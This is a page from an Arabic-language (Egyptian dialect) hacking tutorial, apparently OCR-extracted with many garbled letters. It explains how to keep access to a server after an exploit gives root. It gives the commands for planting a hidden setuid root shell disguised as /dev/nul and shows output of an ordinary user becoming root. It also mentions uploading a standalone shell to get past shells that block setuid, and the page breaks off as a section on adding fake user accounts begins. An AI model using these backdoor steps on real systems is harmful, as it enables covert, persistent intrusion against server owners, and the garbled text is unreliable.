Page 255 - بسم الله الرحمن الرحيم
P. 255
في حاجهه ..انت لو كتبت exitحتطلع بره السيرفير ده و تصعود للشيل بتاعك و عشان تصرجهع تصاني يلزمك
نفس الخطوات
و في هذه الفتره قد يحتمل ان يكون الدمين قد قا.م بتغيير الباسورد او ركب باتصش للديمون المصاب او قا.م
بعمل اب جهريد له
مما يؤدي ان تصفشل الكسبلويت في عملها ..و الحل ؟؟
بس احنا دلوقتي رووت و ممكن نعمل اللي في نفسنا ...اذن نركب باك دوور يسمح لنا بالعوده بعد ذلك في
اي وقت ..
احسن باك دور هوه الهاك اتصاك ..صعب ان النورتصون يكشفه و ممك...اه =| =|
ايه الكل.م ده ياد يا ايسر ؟؟؟؟
هاك اتصاك =| !!!!!!
اسف نسيت (= ...
طبعا الباك دورز في موضوعي ده تصختلف تصماما عن الكل.م الفاضي ده و ل مؤاختذه
طبعا الباك دورز دي عايزالها موضوع لواحده ان شاء احطه لكم قريبا ..لكن انا ساذكر لكم الساسيات
فقط ..
-1ازاي تصعمل sushi؟؟؟؟
لكي تصقو.م بعمل sushiاو suid shellيلزمك ان تصقو.م بنسخ ال bin/sh/
الى مكان ختفي و نقو.م باعطاءه صلحيات ال suidكالتالي :
sh-2.03$ cp /bin/sh /dev/nul
هههههه
في اغلب الحيان الدمين ل ينظر داختل الدايركتوري .. devو لو حصل و نظر دختله فانه لن يشعر بشيء
غريب لن فيه ملف اساسا اسمه null
= Dل ده احنا عيال جهدعان اوي =D
sh-2.03$ cd /dev
sh-2.03$ chown root nul
نعطي الشيل الصلحيات اللي احنا عايزينها -:
sh-2.03$ chmod 4775 nul
4775معناها ال suidاللي احنا عايزينها .
ختلي بالك ان المر chmod +s nulممكن ميشتغلش في بعض النظمه ..ختليك مع المر الول بيعمل
في كله ..
كده ختلصنا مهمتنا ..تصعالى نطلع بره كده و نشوف
sh-2.03$ exit
بعد 80يو.م لو رجهعنا = Dتصعال نشوف كده اللي حيحصل :
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
احنا سوبر يوزرز الن بكل سهوله =(
فيه مشكله ..في كثير من الشيلز تصمنع اعطاء صلحيات ال suidيعني مينفعش نحصل على ال sushi
و في هذه الحاله يلزمنا ان نرفع للسيرفير المخترق شيل ختاص تصاني اسمه sashو هو اختتصار ل A
stand-alone shell
ذو اوامر ختاصه به ...
و هو يسمح باعطاء صلحيات ال suidل bin/sh/اذن نقدر نعمل الن ال sushi
-2كيف نضيف يوزرز مزورين ؟؟
255
